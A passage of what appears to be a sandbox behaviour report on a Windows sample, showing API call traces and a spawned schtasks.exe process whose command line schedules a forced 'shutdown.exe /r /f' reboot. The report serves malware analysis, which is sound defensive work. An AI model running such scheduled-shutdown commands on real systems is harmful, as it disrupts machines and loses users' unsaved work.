lpNumberOfBytesRead=0x0) returned 1 [0039.023] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16df21, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.023] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.023] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.023] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4b8350 [0039.024] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16df20, lpBuffer=0x4b8350, nSize=0x1c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8350*, lpNumberOfBytesRead=0x0) returned 1 [0039.024] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.024] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.024] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.024] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4bc1b0 [0039.024] StrCmpIW (psz1="1R6PFH", psz2="1R6PFH") returned 0 [0039.024] LocalFree (hMem=0x4bc1b0) returned 0x0 [0039.024] LocalFree (hMem=0x4b8320) returned 0x0 [0039.024] LocalFree (hMem=0x4bc190) returned 0x0 [0039.024] LocalFree (hMem=0x4bc150) returned 0x0 [0039.024] LocalFree (hMem=0x4b8350) returned 0x0 [0039.024] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x192d30, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.025] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.025] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.025] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4b8350 [0039.025] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x181860, lpBuffer=0x4b8350, nSize=0x1c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8350*, lpNumberOfBytesRead=0x0) returned 1 [0039.025] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.025] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.028] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0039.028] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1818c0, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.028] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185fd1, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.029] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.029] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.029] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc150 [0039.029] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185fd0, lpBuffer=0x4bc150, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.029] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.029] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.029] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.029] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8380 [0039.029] StrCmpIW (psz1="NT AUTHORITY", psz2="1R6PFH") returned 1 [0039.030] LocalFree (hMem=0x4b8380) returned 0x0 [0039.030] LocalFree (hMem=0x4b8350) returned 0x0 [0039.030] LocalFree (hMem=0x4b8320) returned 0x0 [0039.030] LocalFree (hMem=0x4bc150) returned 0x0 [0039.030] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16d5b0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.030] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.030] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.030] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4bc150 [0039.030] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185db0, lpBuffer=0x4bc150, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.030] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.031] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.031] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc190 [0039.031] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185dd0, lpBuffer=0x4bc190, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc190*, lpNumberOfBytesRead=0x0) returned 1 [0039.031] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185df1, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.031] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.031] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.031] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc1b0 [0039.031] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x185df0, lpBuffer=0x4bc1b0, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc1b0*, lpNumberOfBytesRead=0x0) returned 1 [0039.031] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.032] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.032] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.032] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc1d0 [0039.032] StrCmpIW (psz1="WORKGROUP", psz2="1R6PFH") returned 1 [0039.032] LocalFree (hMem=0x4bc1d0) returned 0x0 [0039.032] LocalFree (hMem=0x4bc150) returned 0x0 [0039.032] LocalFree (hMem=0x4bc190) returned 0x0 [0039.032] LocalFree (hMem=0x4bc1b0) returned 0x0 [0039.032] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x13f590, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.032] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68, lpNumberOfBytesRead=0x0) returned 0 [0039.032] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.032] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.033] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.033] LocalAlloc (uFlags=0x40, uBytes=0x2) returned 0x4bae30 [0039.033] StrCmpIW (psz1="", psz2="1R6PFH") returned -1 [0039.033] LocalFree (hMem=0x4bae30) returned 0x0 [0039.033] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x12ff40, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.033] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.033] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.033] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4bc1b0 [0039.033] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x134400, lpBuffer=0x4bc1b0, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc1b0*, lpNumberOfBytesRead=0x0) returned 1 [0039.034] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.034] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.034] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc190 [0039.034] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x134420, lpBuffer=0x4bc190, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc190*, lpNumberOfBytesRead=0x0) returned 1 [0039.034] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x12e611, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.034] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.034] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.034] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc150 [0039.034] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x12e610, lpBuffer=0x4bc150, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.035] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.035] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.035] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.035] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc1d0 [0039.035] StrCmpIW (psz1="WORKGROUP", psz2="1R6PFH") returned 1 [0039.035] LocalFree (hMem=0x4bc1d0) returned 0x0 [0039.035] LocalFree (hMem=0x4bc1b0) returned 0x0 [0039.035] LocalFree (hMem=0x4bc190) returned 0x0 [0039.035] LocalFree (hMem=0x4bc150) returned 0x0 [0039.035] LocalFree (hMem=0x4bad20) returned 0x0 [0039.035] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x4bb4f0, dwFlags=0x0 | out: hAlgorithm=0x4bb4f0) returned 0x0 [0039.035] BCryptDestroyKey (in: hKey=0x4bb610 | out: hKey=0x4bb610) returned 0x0 [0039.037] LocalFree (hMem=0x4bb610) returned 0x0 [0039.037] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x4bbd80, dwFlags=0x0 | out: hAlgorithm=0x4bbd80) returned 0x0 [0039.038] BCryptDestroyKey (in: hKey=0x4bbea0 | out: hKey=0x4bbea0) returned 0x0 [0039.038] LocalFree (hMem=0x4bbea0) returned 0x0 [0039.038] FreeLibrary (hLibModule=0x7fefca80000) returned 1 [0039.038] CloseHandle (hObject=0x4c) returned 1 [0039.038] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0039.038] RtlExitUserProcess (ExitCode=0x0) Process: id = "4" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x6fb98000" os_pid = "0x99c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x960" cmd_line = "schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 395 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 396 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 397 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 398 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 399 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 400 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 401 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 402 start_va = 0x7b0000 end_va = 0x7ddfff entry_point = 0x7c7683 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 403 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 404 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 405 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 406 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 407 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 408 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 409 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 410 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 411 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 412 start_va = 0x350000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 413 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 414 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 415 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 419 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 420 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 421 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 422 start_va = 0x74a50000 end_va = 0x74a58fff entry_point = 0x74a51830 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll") Region: id = 423 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 424 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 425 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 426 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 427 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 428 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 429 start_va = 0x76110000 end_va = 0x7619efff entry_point = 0x76113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 430 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 431 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 432 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 433 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 434 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 435 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 436 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 437 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 438 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 439 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 440 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 441 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 449 start_va = 0x3d0000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 450 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 451 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 452 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 453 start_va = 0x70000 end_va = 0x81fff entry_point = 0x70000 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 454 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 455 start_va = 0x7e0000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 456 start_va = 0x970000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 457 start_va = 0x74a40000 end_va = 0x74a48fff entry_point = 0x74a41220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 458 start_va = 0x1d70000 end_va = 0x203efff entry_point = 0x1d70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 459 start_va = 0x74680000 end_va = 0x746fffff entry_point = 0x746937c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 460 start_va = 0x2040000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 461 start_va = 0x690000 end_va = 0x76efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 463 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 464 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 465 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 467 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 468 start_va = 0x750c0000 end_va = 0x75142fff entry_point = 0x750c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 470 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 471 start_va = 0x749b0000 end_va = 0x74a2cfff entry_point = 0x749b166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 472 start_va = 0x74980000 end_va = 0x749aefff entry_point = 0x74981142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 10 os_tid = 0x9a0 [0038.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fba4 | out: lpSystemTimeAsFileTime=0x18fba4*(dwLowDateTime=0xda3f7170, dwHighDateTime=0x1d2f1b1)) [0038.574] GetCurrentProcessId () returned 0x99c [0038.574] GetCurrentThreadId () returned 0x9a0 [0038.574] GetTickCount () returned 0x10b07 [0038.574] RtlQueryPerformanceCounter () returned 0x1 [0038.600] GetModuleHandleA (lpModuleName=0x0) returned 0x7b0000 [0038.667] __set_app_type (_Type=0x1) [0038.667] __p__fmode () returned 0x769e31f4 [0038.667] __p__commode () returned 0x769e31fc [0038.667] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7c7881) returned 0x0 [0038.669] __wgetmainargs (in: _Argc=0x7d9e6c, _Argv=0x7d9e74, _Env=0x7d9e70, _DoWildCard=0, _StartInfo=0x7d9e80 | out: _Argc=0x7d9e6c, _Argv=0x7d9e74, _Env=0x7d9e70) returned 0 [0038.670] _onexit (_Func=0x7d0fe2) returned 0x7d0fe2 [0038.671] _onexit (_Func=0x7d0ff3) returned 0x7d0ff3 [0038.671] _onexit (_Func=0x7d1002) returned 0x7d1002 [0038.671] _onexit (_Func=0x7d101e) returned 0x7d101e [0038.671] _onexit (_Func=0x7d103a) returned 0x7d103a [0038.671] _onexit (_Func=0x7d1056) returned 0x7d1056 [0038.671] _onexit (_Func=0x7d1072) returned 0x7d1072 [0038.671] _onexit (_Func=0x7d108e) returned 0x7d108e [0038.671] _onexit (_Func=0x7d10aa) returned 0x7d10aa [0038.672] _onexit (_Func=0x7d10c6) returned 0x7d10c6 [0038.672] _onexit (_Func=0x7d10e2) returned 0x7d10e2 [0038.672] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.672] WinSqmIsOptedIn () returned 0x0 [0038.673] SetLastError (dwErrCode=0x0) [0038.673] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0038.673] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0038.673] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0038.673] VerifyVersionInfoW (in: lpVersionInformation=0x18f61c, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x18f61c) returned 1 [0038.673] lstrlenW (lpString="") returned 0 [0038.674] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.674] SetLastError (dwErrCode=0x0) [0038.675] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.675] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a59d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe") returned 0x20 [0038.675] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74a40000 [0038.773] GetProcAddress (hModule=0x74a40000, lpProcName="GetFileVersionInfoSizeW") returned 0x74a419d9 [0038.773] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0038.775] GetProcAddress (hModule=0x74a40000, lpProcName="GetFileVersionInfoW") returned 0x74a419f4 [0038.775] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5a5be0 | out: lpData=0x5a5be0) returned 1 [0038.775] GetProcAddress (hModule=0x74a40000, lpProcName="VerQueryValueW") returned 0x74a41b51 [0038.775] VerQueryValueW (in: pBlock=0x5a5be0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18f724, puLen=0x18f728 | out: lplpBuffer=0x18f724*=0x5a5f7c, puLen=0x18f728) returned 1 [0038.779] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.779] _vsnwprintf (in: _Buffer=0x5a59d0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18f70c | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0038.779] VerQueryValueW (in: pBlock=0x5a5be0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18f734, puLen=0x18f730 | out: lplpBuffer=0x18f734*=0x5a5da8, puLen=0x18f730) returned 1 [0038.779] 